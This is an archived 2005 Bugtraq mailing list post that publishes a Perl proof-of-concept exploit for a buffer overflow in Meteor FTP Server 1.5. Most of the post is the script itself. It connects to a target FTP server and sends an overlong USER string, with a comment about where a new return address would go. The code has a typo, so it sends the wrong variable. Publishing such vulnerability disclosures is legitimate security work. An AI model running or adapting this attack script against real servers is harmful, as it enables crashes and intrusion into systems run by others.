Bugtraq mailing list archives
Meteor FTP Server: PoC Exploit
From: Dim K0r0l <dim () acolytez com>
Date: Tue, 24 May 2005 02:08:30 +0400
[INTRO] Affected version: 1.5 Hello to all! Bug was found by Auston J (Anix44 () gmail com) today. So its perl code for demostration [----] [CODE] #!/usr/bin/perl # # 47meteor_bof.pl - PoC exploit for Meteor FTP Server# version 1.5 # bug found by Anix44 () gmail com # # coded by k0r0l from acolytez team # visit http://acolytez.com for details #
use Net::FTP; # geting data $host = @ARGV[0]; $port = @ARGV[1]; $debug = @ARGV[2]; # =========== $ftp_error = "Unable"; if (($host) && ($port)) {# make exploit string
$exploit_string = "USER "; $exploit_string .= "X"x80; #$exploit_string .= "\n\n\n\n"; - it will be new return point ! # ===================print "Trying to connect to $host:$port\n"; $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n"; print "Sending string...\n"; $sock->login($exploit_sting, "testpassword"); $answer = $sock->message; if ($answer =~ m/$ftp_error/i) { print "\n[-] Sorry! Failed\n"; } else { print "\n[+] Send ok!\nServer can be explorated!\n\n"; }} else { print "\nMeteor FTP Server - PoC Exploit\nhttp://AcolyteZ.com\n\nUsing: $0 host port [debug: 1 or 0]\n\n";
} [----] -- +################################+ # Dim K0r0l (dim () acolytez com) # # # # http://AcolyteZ.com # # Net-security, coding, soft etc # +################################+
Current thread:
- Meteor FTP Server: PoC Exploit Dim K0r0l (May 26)